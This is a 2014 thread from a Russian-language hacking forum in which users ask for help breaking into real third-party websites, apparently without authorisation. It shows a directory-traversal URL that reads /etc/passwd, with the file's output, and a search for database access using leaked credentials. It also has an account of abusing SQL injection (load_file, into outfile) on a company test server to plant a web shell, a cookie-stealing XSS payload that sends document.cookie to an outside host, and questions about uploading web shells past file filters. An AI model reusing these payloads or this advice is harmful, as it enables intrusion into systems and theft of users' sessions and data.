ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
06.03.2014, 19:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
8705
Репутация:
81
|
|
Сообщение от swat_
swat_ said:
Нашел на сайте читалку файлов,нашел лог,пишу в лог , , и тд но не работает , в логах этот код выделяется красным ,и не хочет исполняться , что делать?
есть на сайте файли phpinfo.php
вот инфа от туда
register_globals Off
safe_mode Off
magic_quotes_gpc Off
Взлом - это в первую очередь изначально сбор информации о цели. Ты либо ее не собрал либо не показал нам: порты, субдомены, скан директорий, какая CMS, информация о домене, хостере, пробив мыл с сайта, проверка диапазона сети, чек найденных паролей на других сервисах etc.
|
|
|
|
06.03.2014, 20:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
20730
Репутация:
0
|
|
Прошу помощи, нашёл на сайте это:
http://site.com/file.php?filename=../../../../../../../../../../etc/passwd
Выводит содержимое:
Код:
Code:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
qpidd:x:498:499:Owner of Qpidd Daemons:/var/lib/qpidd:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
webuser:x:497:495::/home/webuser:/sbin/nologin
user123:x:500:500::/data/www:/sbin/nologin
administrator:x:501:501::/home/administrator:/bin/bash
по сути я весь исходный код сайта прочитал, нашёл данные от БД, но удаленно подключится не получилось.
Подскажите что можно ещё сделать? нужно получить доступ к БД. |
|
|
|
06.03.2014, 20:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
8705
Репутация:
81
|
|
sav77,в случае если это все-же LFI попробуй например:
_ttp://forum.xakepinter.net/showthread.php?t=474
|
|
|
|
06.03.2014, 20:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
20730
Репутация:
0
|
|
Сообщение от OxoTnik
OxoTnik said:
sav77
ищи phpmyadmin.
И вообще, ты полностью копируешь вопросы предыдущего оратора, смотри ответы выше
Сайт работает на MSSQL, но там указан ip к подключению этот 192.168.1.19, хз как подключится к нему...
Там не LFI, а directory traversal я так понял.
|
|
|
|
06.03.2014, 22:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
15532
Репутация:
4
|
|
Продолжение все той же прошлой истории.
Когда я уже решил забить на взлом сайта (ну, точней как, полазить в БД я смог, что интересно было посмотрел, но вообще мне хотелось внедрить шелл), я решил пробить адрес сайта в гугле и обнаружил их тестовый сервер, который функционально работает точно так же, как и оригинал. Что приятно, на тестовом сервере БД работает под админской учетной записью. Права file_priv есть, файлы через load_file() читаются, а значит логично предположить, что в таких условиях и into outfile тоже должен быть активен. Тем не менее, писать файлы мне не удается, предположительно из-за того, что у mysql процесса нет прав на запись в тех директориях, куда я пробовал. Что самое удивительное, мне почему-то не удается записать файл даже через select 1 into outfile 'tmp.txt', т.е. в домашнюю директорию mysql, куда, по идее, mysql должен иметь права на запись.
Так вот, как вообще находят директории для записи файлов? Банально логически или есть какой-то подход? И какие директории можно протестировать, чтобы понять наверняка, может ли msql вообще хоть куда-нибудь писать файлы или нет.
Upd: попробовал писать хотя бы в /tmp но тоже не срабатывает, что совсем странно. Я теряюсь в догадках, в чем может быть дело, с учетом того, что это тестовый сервер и аккаунт к БД админский (т.е. логично предположить, что там не должно быть строгой защиты) - то ли я что-то делаю не то, либо на mysql процесс висит запрет на запись файлов, либо я даже не знаю что тут думать. При этом на тестовой сервере открыт порт mysql (хотя конечно же я не могу подключится без соответствующей записи в БД, которую наврядли можно добавить через select инъекцию) и несколько устаревший webmin 1.5.9
Upd2: вобщем, оказалось, что несмотря на сообщение об ошибке, файлы писались на тестовом сервере (заодно узнал, что на основном сервере у меня все же нет FILE прав), но доступа на запись в домашний каталог у меня нет (где и располагались файлы сайта), и LFI уязвимостей в имеющемся коде тоже нет. Так что без вариантов, разве что внезапно появится какой-нить подходящий эксплоит.
|
|
|
|
06.03.2014, 22:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
6813
Репутация:
0
|
|
Сообщение от None
img = new Image(); img.src = "http://httpz.org/***.png"+document.cookie; location.href ="http://*****.ru//"
Парни вот это мы куда потом в консоль пишем помогите плиз)
|
|
|
|
07.03.2014, 01:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
12404
Репутация:
0
|
|
Можно ли залить веб шелл в одном из этих форматов?
Сообщение от None
7z|aiff|asf|avi|bmp|csv|doc|fla|flv|gif|gz|gzip|jp eg|jpg|mid|mov|mp3|mp4|mpc|mpeg|mpg|ods|odt|pdf|pn g|ppt|pxd|qt|ram|rar|rm|rmi|rmvb|rtf|sdc|sitd|swf| sxc|sxw|tar|tgz|tif|tiff|txt|vsd|wav|wma|wmv|xls|x ml|zip
|
|
|
|
07.03.2014, 01:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от zombak18
zombak18 said:
Можно ли залить веб шелл в одном из этих форматов?
та в любом можно, только работать не в одном не будет
|
|
|
|
07.03.2014, 01:41
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от zombak18
zombak18 said:
Можно ли залить веб шелл в одном из этих форматов?
Смотря при каких обстоятельствах.
Из под админки загрузить файл с вредоносом - одно, при LFI - уже совсем другое, обойти преобразование типов, resize - вообще третье.
Так что информации очень мало для однозначного ответа.
|
|
|
07.03.2014, 17:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
6813
Репутация:
0
|
|
Никто не поможет?)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
